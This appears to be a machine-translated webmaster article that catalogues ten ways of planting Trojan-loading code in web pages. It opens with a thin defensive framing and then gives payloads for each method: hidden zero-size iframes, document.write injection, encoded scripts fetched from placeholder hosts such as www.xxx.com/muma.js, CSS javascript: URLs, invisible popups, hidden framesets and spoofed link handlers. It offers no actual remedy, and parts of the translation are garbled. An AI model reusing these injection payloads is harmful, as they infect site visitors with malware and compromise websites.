Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall
As a webmaster is not afraid of the site is hung horse? Then first to understand how they hang horses, know that, the right remedy!
One: Frame hanging horse
<iframe src= Address width=0 height=0></iframe>
Two: JS file hanging Horse
First, the following code
document.write ("<iframe width= ' 0 ' height= ' 0 ' src= ' address ' ></iframe>");
Save As Xxx.js,
Then JS hanging Horse code for
<script Language=javascript src=xxx.js></script>
Three: JS deformation encryption
<script language= "Jscript.encode" src=http://www.xxx.com/muma.txt></script>
Muma.txt can be changed to any suffix
Four: The body hangs the horse
<body onload= "window.location= ' address"; ></body>
Five: Concealed Hanging horse
Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n<iframe src= ' http://www.xxx.com/muma.htm/' > </iframe> ';
Six: the horse hanging in CSS
Body {
Background-image:url (' Javascript:document.write ("<script src=http://www.xxx.net/muma.js></script>")}
Seven: Jaja Hanging Horse
<script language=javascript>
window.open ("Address", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1 ");
</script>
Eight: Picture camouflage
<html>
<iframe src= "net horse address" height=0 width=0></iframe>
<img src= "Picture address" ></center>
</html>
Nine: Camouflage Call:
<frameset rows= "444,0" cols= "*" >
<frame src= "Open Web page" framborder= "no" scrolling= "Auto" noresize marginwidth= "0" margingheight= "0" >
<frame src= "Net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>
Ten: Advanced Deception
<a href= "http://www.163.com (confuse connection address, show this address to point to Trojan address)" onmouseover= "www_163_com (); > page to display the content </a>
<script language= "JavaScript"
Function www_163_com ()
{
var url= "net horse address";
Open (URL, "NewWindow", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no," Copyhistory=yes,width=800,height=600,left=10,top=10 ");
}
</SCRIPT>